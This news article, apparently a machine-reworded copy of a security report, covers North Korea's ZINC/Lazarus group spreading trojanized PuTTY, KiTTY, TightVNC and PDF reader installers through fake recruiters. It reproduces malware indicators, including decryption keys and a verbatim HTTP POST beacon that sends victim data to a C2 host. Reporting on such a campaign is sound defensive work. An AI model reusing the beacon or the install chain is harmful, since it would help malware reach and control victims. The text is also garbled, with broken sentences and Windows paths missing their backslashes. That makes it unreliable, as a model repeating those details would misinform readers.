Many organizations hacked after installing militarized open source apps


Getty Images

North Korean government-backed hackers are weaponizing well-known open-source software in an ongoing campaign that has already successfully compromised “many” organizations in media, defense, aerospace and IT services, Microsoft said Thursday.

ZINC, the name given by Microsoft to a group of threat actors also known as Lazarus, which is best known for leading the devastating 2014 compromise of Sony Pictures Entertainment, bundled PuTTY and other legitimate open-source applications with highly encrypted that ends up installing spyware malware.

Hackers then pose as job recruiters and connect with individuals from targeted organizations via LinkedIn. After building up a level of trust over a series of conversations and eventually moving them to WhatsApp messaging, hackers ask individuals to install the apps, which infect employees’ work environments.


“Actors have successfully compromised numerous organizations since June 2022,” members of the Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense teams wrote in a post. “Due to the widespread use of the platforms and software that ZINC is using in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple industries and regions.”

PuTTY is a popular terminal emulator, serial console, and network file transfer application that supports network protocols including SSH, SCP, Telnet, rlogin, and raw socket login. Two weeks ago, security firm Mandiant warned that hackers with ties to North Korea had infected it with a Trojan horse in a campaign that successfully compromised a customer’s network. Thursday’s post says the same hackers have also armed KiTTY, TightVNC, Sumatra PDF Reader and muPDF/Subliminal Recording software with code that installs the same spyware malware, which Microsoft has named ZetaNile.

Lazarus was once a ragtag group of hackers with only marginal resources and skills. Over the past decade, his prowess has increased dramatically. His attacks on cryptocurrency exchanges over the past five years have generated billions of dollars for the nation’s weapons of mass destruction programs. They routinely find and exploit zero-day vulnerabilities in heavily hardened applications and use many of the same malware techniques used by other state-sponsored groups.

The group primarily relies on spear phishing as an initial vehicle for its victims, but it also sometimes uses other forms of social engineering and compromise on the website. A common theme is that members target employees of organizations they want to compromise, often by tricking them or forcing them to install Trojan horse software.

The Trojan-protected PuTTY and KiTTY applications that Microsoft has observed use a clever mechanism to ensure that only intended targets are infected and that they do not inadvertently infect others. Application installers do not execute any malicious code. Instead, ZetaNile malware is installed only when apps connect to a specific IP address and use login credentials that fake recruiters give to targets.

The trojanized PuTTY executable uses a technique called DLL search order hijacking, which loads and decrypts a second-stage payload when presented with the key “0CE1241A44557AA438F27BC6D4ACA246” for use as command and control. Once successfully connected to the C2 server, attackers can install additional malware on the compromised device. The KiTTY app works the same way.

Similarly, the malicious TightVNC viewer installs its final payload only when a user selects ec2-aet-tech.w-ada[.]amazonaws from the prepopulated remote hosts drop-down menu in the TightVNC viewer.


Continuation of Thursday’s article:

The Trojan version of Sumatra PDF Reader named SecurePDF.exe has been used by ZINC since at least 2019 and remains a unique ZINC craft. SecurePDF.exe is a modular loader that can install the ZetaNile implant by loading a job application themed file armed with a .PDF extension. The fake PDF contains an “SPV005” header, a decryption key, an encrypted second-stage implant payload, and an encrypted decoy PDF, which is rendered in the Sumatra PDF reader when the file is opened.

Once loaded into memory, the second-stage malware is configured to send the victim’s system hostname and device information using custom encryption algorithms to a C2 communication server in as part of the C2 registration process. Attackers can install additional malware on compromised devices using C2 communication if necessary.


The post continued:

In the trojanized version of the muPDF/Subliminal Recording installer, setup.exe is configured to check if the file path ISSetupPrerequisitesSetup64.exe exist and write C:colrctlcolorui.dll on disk after extracting the executable embedded inside setup.exe. It then copies C:WindowsSystem32ColorCpl.exe at C:ColorCtrlColorCpl.exe. For second-stage malware, the malicious installer creates a new process C:colorctrlcolorcpl.exe C3A9B30B6A313F289297C9A36730DB6Dand the argument C3A9B30B6A313F289297C9A36730DB6D is forwarded to colorui.dll as a decryption key. The DLL colorui.dll, which Microsoft tracks as EventHorizon malware family, is injected into C:WindowsSystemcredwiz.exe Where iexpress.exe to send HTTP C2 requests as part of the victim registration process and to obtain additional payload.

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bb =[encrypted payload]= &items=[encrypted payload]

The message provides technical indicators that organizations can look for to determine if endpoints inside their networks are infected. It also includes the IP addresses used in the campaign that administrators can add to their network blocklists.


Comments are closed.